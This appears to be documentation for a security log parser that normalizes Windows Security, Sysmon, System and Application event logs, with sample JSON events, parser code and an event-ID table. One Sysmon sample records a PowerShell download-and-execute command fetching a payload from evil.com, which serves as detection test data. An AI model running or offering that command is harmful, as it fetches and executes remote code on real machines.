Parser Example
Windows Event Channel
Windows Event Channel
Overview
Parser xử lý Windows Event Logs dạng JSON từ các Event Channel:
- Security: Authentication, Authorization, Account Management (Event ID 4624, 4625, 4648, 4720, 4722, 4732, etc.)
- System: System startup/shutdown, Driver events, Service events
- Application: Application errors, warnings, events
- Microsoft-Windows-Sysmon/Operational: Process creation, Network connections, File operations
Sample Logs
1. Security - Successful Logon (Event ID 4624)
{"timestamp":"2026-03-17T10:30:45.123Z","host":"DC01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Microsoft-Windows-Security-Auditing\",\"@Guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:30:45.123Z\"},\"EventRecordID\":\"123456\",\"Channel\":\"Security\",\"Computer\":\"DC01.corp.local\"},\"EventData\":{\"SubjectUserSid\":\"S-1-5-18\",\"SubjectUserName\":\"DC01$\",\"SubjectDomainName\":\"CORP\",\"SubjectLogonId\":\"0x3e7\",\"TargetUserSid\":\"S-1-5-21-123456789-1234567890-1234567890-1001\",\"TargetUserName\":\"admin.user\",\"TargetDomainName\":\"CORP\",\"TargetLogonId\":\"0x1a2b3c4d\",\"LogonType\":\"10\",\"LogonProcessName\":\"User32\",\"AuthenticationPackageName\":\"Negotiate\",\"WorkstationName\":\"WORKSTATION01\",\"IpAddress\":\"192.168.1.100\",\"IpPort\":\"52431\",\"ProcessId\":\"0x1234\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"}}}"}
2. Security - Failed Logon (Event ID 4625)
{"timestamp":"2026-03-17T10:31:15.456Z","host":"DC01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Microsoft-Windows-Security-Auditing\"},\"EventID\":\"4625\",\"Level\":\"0\",\"Task\":\"12544\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:31:15.456Z\"},\"EventRecordID\":\"123457\",\"Channel\":\"Security\",\"Computer\":\"DC01.corp.local\"},\"EventData\":{\"SubjectUserSid\":\"S-1-0-0\",\"SubjectUserName\":\"-\",\"TargetUserSid\":\"S-1-0-0\",\"TargetUserName\":\"hacker\",\"TargetDomainName\":\"CORP\",\"Status\":\"0xc000006d\",\"FailureReason\":\"%%2313\",\"SubStatus\":\"0xc000006a\",\"LogonType\":\"3\",\"LogonProcessName\":\"NtLmSsp\",\"AuthenticationPackageName\":\"NTLM\",\"WorkstationName\":\"ATTACKER-PC\",\"IpAddress\":\"10.0.0.55\",\"IpPort\":\"44521\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\"}}}"}
3. Security - User Account Created (Event ID 4720)
{"timestamp":"2026-03-17T10:35:22.789Z","host":"DC01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Microsoft-Windows-Security-Auditing\"},\"EventID\":\"4720\",\"Level\":\"0\",\"Task\":\"13824\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:35:22.789Z\"},\"EventRecordID\":\"123458\",\"Channel\":\"Security\",\"Computer\":\"DC01.corp.local\"},\"EventData\":{\"TargetUserName\":\"newuser\",\"TargetDomainName\":\"CORP\",\"TargetSid\":\"S-1-5-21-123456789-1234567890-1234567890-1102\",\"SubjectUserSid\":\"S-1-5-21-123456789-1234567890-1234567890-500\",\"SubjectUserName\":\"Administrator\",\"SubjectDomainName\":\"CORP\",\"SubjectLogonId\":\"0x1234abcd\",\"PrivilegeList\":\"-\",\"SamAccountName\":\"newuser\",\"DisplayName\":\"New User\",\"UserPrincipalName\":\"newuser@corp.local\",\"HomeDirectory\":\"-\",\"HomePath\":\"-\",\"ScriptPath\":\"-\",\"ProfilePath\":\"-\",\"UserWorkstations\":\"-\",\"PasswordLastSet\":\"%%1793\",\"AccountExpires\":\"%%1794\",\"PrimaryGroupId\":\"513\",\"AllowedToDelegateTo\":\"-\",\"OldUacValue\":\"0x0\",\"NewUacValue\":\"0x15\",\"UserAccountControl\":\"%%2080 %%2082 %%2084\",\"UserParameters\":\"-\",\"SidHistory\":\"-\",\"LogonHours\":\"%%1793\"}}}"}
4. Sysmon - Process Creation (Event ID 1)
{"timestamp":"2026-03-17T10:40:33.012Z","host":"WORKSTATION01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Microsoft-Windows-Sysmon\",\"@Guid\":\"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:40:33.012Z\"},\"EventRecordID\":\"654321\",\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"WORKSTATION01.corp.local\"},\"EventData\":{\"RuleName\":\"technique_id=T1059.001,technique_name=PowerShell\",\"UtcTime\":\"2026-03-17 10:40:33.012\",\"ProcessGuid\":\"{12345678-abcd-1234-efgh-123456789012}\",\"ProcessId\":\"4576\",\"Image\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"FileVersion\":\"10.0.19041.1\",\"Description\":\"Windows PowerShell\",\"Product\":\"Microsoft® Windows® Operating System\",\"Company\":\"Microsoft Corporation\",\"OriginalFileName\":\"PowerShell.EXE\",\"CommandLine\":\"powershell.exe -ep bypass -nop -c \\\"IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')\\\"\",\"CurrentDirectory\":\"C:\\\\Users\\\\victim\\\\Desktop\\\\\",\"User\":\"CORP\\\\victim\",\"LogonGuid\":\"{12345678-1111-2222-3333-444444444444}\",\"LogonId\":\"0x5678\",\"TerminalSessionId\":\"1\",\"IntegrityLevel\":\"High\",\"Hashes\":\"MD5=D57D03D81D1B85F0E0CF40E8E5B1F8A8,SHA256=0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\",\"ParentProcessGuid\":\"{12345678-aaaa-bbbb-cccc-dddddddddddd}\",\"ParentProcessId\":\"3456\",\"ParentImage\":\"C:\\\\Windows\\\\explorer.exe\",\"ParentCommandLine\":\"C:\\\\Windows\\\\Explorer.EXE\",\"ParentUser\":\"CORP\\\\victim\"}}}"}
5. System - Service Start/Stop (Event ID 7036)
{"timestamp":"2026-03-17T10:45:55.234Z","host":"SERVER01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Service Control Manager\",\"@Guid\":\"{555908d1-a6d7-4695-8e1e-26931d2012f4}\",\"@EventSourceName\":\"Service Control Manager\"},\"EventID\":{\"#text\":\"7036\",\"@Qualifiers\":\"16384\"},\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"0\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:45:55.234Z\"},\"EventRecordID\":\"789012\",\"Channel\":\"System\",\"Computer\":\"SERVER01.corp.local\"},\"EventData\":{\"param1\":\"Windows Update\",\"param2\":\"running\"}}}"}
6. Application - Application Error (Event ID 1000)
{"timestamp":"2026-03-17T10:50:12.567Z","host":"WORKSTATION01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Application Error\"},\"EventID\":{\"#text\":\"1000\",\"@Qualifiers\":\"0\"},\"Level\":\"2\",\"Task\":\"100\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:50:12.567Z\"},\"EventRecordID\":\"456789\",\"Channel\":\"Application\",\"Computer\":\"WORKSTATION01.corp.local\"},\"EventData\":{\"Data\":[\"notepad.exe\",\"10.0.19041.1\",\"12345678\",\"ntdll.dll\",\"10.0.19041.1234\",\"87654321\",\"c0000005\",\"00012345\",\"1234\",\"01234567890abcdef\",\"C:\\\\Windows\\\\System32\\\\notepad.exe\",\"C:\\\\Windows\\\\System32\\\\ntdll.dll\",\"12345678-1234-1234-1234-123456789012\"]}}}"}
Parser Configuration
#regex
#conditional
event_timestamp = ""
if (ts, err = to_string(.timestamp); err == null) { event_timestamp = ts }
host_hostname = ""
event_id = ""
event_code = ""
event_provider = ""
event_channel = ""
event_category = ""
event_action = ""
event_outcome = ""
event_severity = 0
event_severity_label = ""
event_module = "windows"
log_level = "info"
source_ip = ""
source_port = ""
user_id = ""
user_name = ""
user_domain = ""
target_user_name = ""
target_user_domain = ""
target_user_id = ""
process_pid = ""
process_name = ""
process_executable = ""
process_command_line = ""
process_working_directory = ""
process_parent_pid = ""
process_parent_name = ""
process_parent_command_line = ""
process_entity_id = ""
file_hash_md5 = ""
file_hash_sha256 = ""
host_str = ""
if (h, err = to_string(.host); err == null) { host_str = h }
host_hostname = host_str
msg_str = ""
if (m, err = to_string(.message); err == null) { msg_str = m }
parsed_event = {}
if (pe, err = parse_json(msg_str); err == null) {
parsed_event = pe
}
event_obj = {}
if (ev, err = to_string(parsed_event.Event); err == null) {
if ev != "" {
event_obj = parsed_event.Event
}
}
system_obj = {}
if (sys, err = to_string(event_obj.System); err == null) {
if sys != "" {
system_obj = event_obj.System
}
}
event_data_obj = {}
if (ed, err = to_string(event_obj.EventData); err == null) {
if ed != "" {
event_data_obj = event_obj.EventData
}
}
if (provider_m, err = parse_regex(msg_str, r'"@Name":"(?P<name>[^"]+)"'); err == null) {
event_provider = provider_m.name
}
if (eventid_m, err = parse_regex(msg_str, r'"EventID":"(?P<id>\d+)"'); err == null) {
event_id = eventid_m.id
event_code = eventid_m.id
}
if (eventid_m2, err = parse_regex(msg_str, r'"EventID":\{"#text":"(?P<id>\d+)"'); err == null) {
event_id = eventid_m2.id
event_code = eventid_m2.id
}
if (channel_m, err = parse_regex(msg_str, r'"Channel":"(?P<channel>[^"]+)"'); err == null) {
event_channel = to_string(channel_m.channel)
}
if (computer_m, err = parse_regex(msg_str, r'"Computer":"(?P<computer>[^"]+)"'); err == null) {
host_hostname = to_string(computer_m.computer)
}
if (level_m, err = parse_regex(msg_str, r'"Level":"(?P<level>\d+)"'); err == null) {
level_str = to_string(level_m.level)
if level_str == "1" { log_level = "critical"; event_severity_label = "critical"; event_severity = 1 }
if level_str == "2" { log_level = "error"; event_severity_label = "error"; event_severity = 2 }
if level_str == "3" { log_level = "warning"; event_severity_label = "warning"; event_severity = 3 }
if level_str == "4" { log_level = "info"; event_severity_label = "info"; event_severity = 4 }
if level_str == "5" { log_level = "debug"; event_severity_label = "verbose"; event_severity = 5 }
}
channel_str = to_string(event_channel)
if contains(channel_str, "Security") {
event_module = "windows.security"
if event_id == "4624" {
event_category = "authentication"
event_action = "logon_success"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (target_domain_m, err = parse_regex(msg_str, r'"TargetDomainName":"(?P<domain>[^"]+)"'); err == null) {
target_user_domain = target_domain_m.domain
}
if (target_sid_m, err = parse_regex(msg_str, r'"TargetUserSid":"(?P<sid>[^"]+)"'); err == null) {
target_user_id = target_sid_m.sid
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
if (subject_domain_m, err = parse_regex(msg_str, r'"SubjectDomainName":"(?P<domain>[^"]+)"'); err == null) {
user_domain = subject_domain_m.domain
}
if (subject_sid_m, err = parse_regex(msg_str, r'"SubjectUserSid":"(?P<sid>[^"]+)"'); err == null) {
user_id = subject_sid_m.sid
}
if (ip_m, err = parse_regex(msg_str, r'"IpAddress":"(?P<ip>[^"]+)"'); err == null) {
source_ip = ip_m.ip
}
if (port_m, err = parse_regex(msg_str, r'"IpPort":"(?P<port>[^"]+)"'); err == null) {
source_port = port_m.port
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>[^"]+)"'); err == null) {
process_pid = procid_m.pid
}
if (procname_m, err = parse_regex(msg_str, r'"ProcessName":"(?P<name>[^"]+)"'); err == null) {
process_executable = procname_m.name
}
}
if event_id == "4625" {
event_category = "authentication"
event_action = "logon_failed"
event_outcome = "failure"
log_level = "warning"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (target_domain_m, err = parse_regex(msg_str, r'"TargetDomainName":"(?P<domain>[^"]+)"'); err == null) {
target_user_domain = target_domain_m.domain
}
if (ip_m, err = parse_regex(msg_str, r'"IpAddress":"(?P<ip>[^"]+)"'); err == null) {
source_ip = ip_m.ip
}
if (port_m, err = parse_regex(msg_str, r'"IpPort":"(?P<port>[^"]+)"'); err == null) {
source_port = port_m.port
}
if (workstation_m, err = parse_regex(msg_str, r'"WorkstationName":"(?P<ws>[^"]+)"'); err == null) {
if workstation_m.ws != "-" {
if host_hostname == host_str { host_hostname = workstation_m.ws }
}
}
}
if event_id == "4648" {
event_category = "authentication"
event_action = "explicit_credentials"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (target_domain_m, err = parse_regex(msg_str, r'"TargetDomainName":"(?P<domain>[^"]+)"'); err == null) {
target_user_domain = target_domain_m.domain
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
if (subject_domain_m, err = parse_regex(msg_str, r'"SubjectDomainName":"(?P<domain>[^"]+)"'); err == null) {
user_domain = subject_domain_m.domain
}
}
if event_id == "4720" {
event_category = "iam"
event_action = "user_created"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (target_domain_m, err = parse_regex(msg_str, r'"TargetDomainName":"(?P<domain>[^"]+)"'); err == null) {
target_user_domain = target_domain_m.domain
}
if (target_sid_m, err = parse_regex(msg_str, r'"TargetSid":"(?P<sid>[^"]+)"'); err == null) {
target_user_id = target_sid_m.sid
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
if (subject_domain_m, err = parse_regex(msg_str, r'"SubjectDomainName":"(?P<domain>[^"]+)"'); err == null) {
user_domain = subject_domain_m.domain
}
}
if event_id == "4722" {
event_category = "iam"
event_action = "user_enabled"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
if event_id == "4725" {
event_category = "iam"
event_action = "user_disabled"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
if event_id == "4726" {
event_category = "iam"
event_action = "user_deleted"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
if event_id == "4732" {
event_category = "iam"
event_action = "group_member_added"
event_outcome = "success"
if (member_m, err = parse_regex(msg_str, r'"MemberSid":"(?P<sid>[^"]+)"'); err == null) {
target_user_id = member_m.sid
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
if event_id == "4733" {
event_category = "iam"
event_action = "group_member_removed"
event_outcome = "success"
if (member_m, err = parse_regex(msg_str, r'"MemberSid":"(?P<sid>[^"]+)"'); err == null) {
target_user_id = member_m.sid
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
if event_id == "4688" {
event_category = "process"
event_action = "process_created"
event_outcome = "success"
if (newprocname_m, err = parse_regex(msg_str, r'"NewProcessName":"(?P<name>[^"]+)"'); err == null) {
process_executable = newprocname_m.name
}
if (newprocid_m, err = parse_regex(msg_str, r'"NewProcessId":"(?P<pid>[^"]+)"'); err == null) {
process_pid = newprocid_m.pid
}
if (cmdline_m, err = parse_regex(msg_str, r'"CommandLine":"(?P<cmd>[^"]+)"'); err == null) {
process_command_line = cmdline_m.cmd
}
if (parentprocname_m, err = parse_regex(msg_str, r'"ParentProcessName":"(?P<name>[^"]+)"'); err == null) {
process_parent_name = parentprocname_m.name
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
if (subject_domain_m, err = parse_regex(msg_str, r'"SubjectDomainName":"(?P<domain>[^"]+)"'); err == null) {
user_domain = subject_domain_m.domain
}
}
if event_id == "4689" {
event_category = "process"
event_action = "process_terminated"
event_outcome = "success"
if (procname_m, err = parse_regex(msg_str, r'"ProcessName":"(?P<name>[^"]+)"'); err == null) {
process_executable = procname_m.name
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>[^"]+)"'); err == null) {
process_pid = procid_m.pid
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
}
if contains(channel_str, "Sysmon") {
event_module = "windows.sysmon"
if event_id == "1" {
event_category = "process"
event_action = "process_created"
event_outcome = "success"
if (image_m, err = parse_regex(msg_str, r'"Image":"(?P<image>[^"]+)"'); err == null) {
process_executable = image_m.image
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>\d+)"'); err == null) {
process_pid = procid_m.pid
}
if (cmdline_m, err = parse_regex(msg_str, r'"CommandLine":"(?P<cmd>[^"]+)"'); err == null) {
process_command_line = cmdline_m.cmd
}
if (cwd_m, err = parse_regex(msg_str, r'"CurrentDirectory":"(?P<cwd>[^"]+)"'); err == null) {
process_working_directory = cwd_m.cwd
}
if (user_m, err = parse_regex(msg_str, r'"User":"(?P<user>[^"]+)"'); err == null) {
user_str = user_m.user
if (domain_user_m, err = parse_regex(user_str, r'(?P<domain>[^\\]+)\\(?P<name>.+)'); err == null) {
user_domain = domain_user_m.domain
user_name = domain_user_m.name
}
}
if (pguid_m, err = parse_regex(msg_str, r'"ProcessGuid":"(?P<guid>[^"]+)"'); err == null) {
process_entity_id = pguid_m.guid
}
if (parentid_m, err = parse_regex(msg_str, r'"ParentProcessId":"(?P<pid>\d+)"'); err == null) {
process_parent_pid = parentid_m.pid
}
if (parentimage_m, err = parse_regex(msg_str, r'"ParentImage":"(?P<image>[^"]+)"'); err == null) {
process_parent_name = parentimage_m.image
}
if (parentcmd_m, err = parse_regex(msg_str, r'"ParentCommandLine":"(?P<cmd>[^"]+)"'); err == null) {
process_parent_command_line = parentcmd_m.cmd
}
if (hashes_m, err = parse_regex(msg_str, r'"Hashes":"(?P<hashes>[^"]+)"'); err == null) {
hash_str = hashes_m.hashes
if (md5_m, err = parse_regex(hash_str, r'MD5=(?P<md5>[A-Fa-f0-9]+)'); err == null) {
file_hash_md5 = md5_m.md5
}
if (sha256_m, err = parse_regex(hash_str, r'SHA256=(?P<sha256>[A-Fa-f0-9]+)'); err == null) {
file_hash_sha256 = sha256_m.sha256
}
}
}
if event_id == "3" {
event_category = "network"
event_action = "network_connection"
event_outcome = "success"
if (image_m, err = parse_regex(msg_str, r'"Image":"(?P<image>[^"]+)"'); err == null) {
process_executable = image_m.image
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>\d+)"'); err == null) {
process_pid = procid_m.pid
}
if (srcip_m, err = parse_regex(msg_str, r'"SourceIp":"(?P<ip>[^"]+)"'); err == null) {
source_ip = srcip_m.ip
}
if (srcport_m, err = parse_regex(msg_str, r'"SourcePort":"(?P<port>\d+)"'); err == null) {
source_port = srcport_m.port
}
if (user_m, err = parse_regex(msg_str, r'"User":"(?P<user>[^"]+)"'); err == null) {
user_str = user_m.user
if (domain_user_m, err = parse_regex(user_str, r'(?P<domain>[^\\]+)\\(?P<name>.+)'); err == null) {
user_domain = domain_user_m.domain
user_name = domain_user_m.name
}
}
}
if event_id == "5" {
event_category = "process"
event_action = "process_terminated"
event_outcome = "success"
if (image_m, err = parse_regex(msg_str, r'"Image":"(?P<image>[^"]+)"'); err == null) {
process_executable = image_m.image
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>\d+)"'); err == null) {
process_pid = procid_m.pid
}
}
if event_id == "11" {
event_category = "file"
event_action = "file_created"
event_outcome = "success"
if (image_m, err = parse_regex(msg_str, r'"Image":"(?P<image>[^"]+)"'); err == null) {
process_executable = image_m.image
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>\d+)"'); err == null) {
process_pid = procid_m.pid
}
}
}
if contains(channel_str, "System") {
event_module = "windows.system"
if event_id == "7036" {
event_category = "host"
event_action = "service_state_change"
event_outcome = "success"
}
if event_id == "7045" {
event_category = "host"
event_action = "service_installed"
event_outcome = "success"
}
if event_id == "6005" {
event_category = "host"
event_action = "system_startup"
event_outcome = "success"
}
if event_id == "6006" {
event_category = "host"
event_action = "system_shutdown"
event_outcome = "success"
}
}
if contains(channel_str, "Application") {
event_module = "windows.application"
if event_id == "1000" {
event_category = "process"
event_action = "application_error"
event_outcome = "failure"
log_level = "error"
}
if event_id == "1001" {
event_category = "process"
event_action = "application_crash"
event_outcome = "failure"
log_level = "error"
}
}
if event_category == "" { event_category = "host" }
if event_action == "" { event_action = "info" }
if event_outcome == "" { event_outcome = "unknown" }
#normalize
timestamp: format_timestamp!(parse_timestamp!(event_timestamp, "%Y-%m-%dT%H:%M:%S.%3fZ"), "%Y-%m-%d %H:%M:%S")
event.module: event_module
event.provider: event_provider
event.code: event_code
event.category: event_category
event.action: event_action
event.outcome: event_outcome
event.severity: event_severity
event.severity_label: event_severity_label
log.level: log_level
message: msg_str
host.hostname: host_hostname
source.ip: source_ip
source.port: source_port
user.id: user_id
user.name: user_name
user.domain: user_domain
process.pid: process_pid
process.name: process_name
process.executable: process_executable
process.command_line: process_command_line
process.working_directory: process_working_directory
process.parent.pid: process_parent_pid
process.entity_id: process_entity_id
file.hash.md5: file_hash_md5
file.hash.sha256: file_hash_sha256
Event Categories
| Event ID | Channel | Category | Description |
|---|---|---|---|
| 4624 | Security | authentication | Successful logon |
| 4625 | Security | authentication | Failed logon |
| 4648 | Security | authentication | Logon using explicit credentials |
| 4720 | Security | iam | User account created |
| 4722 | Security | iam | User account enabled |
| 4725 | Security | iam | User account disabled |
| 4726 | Security | iam | User account deleted |
| 4732 | Security | iam | Member added to security-enabled group |
| 4733 | Security | iam | Member removed from security-enabled group |
| 4688 | Security | process | New process created |
| 4689 | Security | process | Process terminated |
| 1 | Sysmon | process | Process creation |
| 3 | Sysmon | network | Network connection |
| 5 | Sysmon | process | Process terminated |
| 11 | Sysmon | file | File created |
| 7036 | System | host | Service state change |
| 7045 | System | host | Service installed |
| 1000 | Application | process | Application error |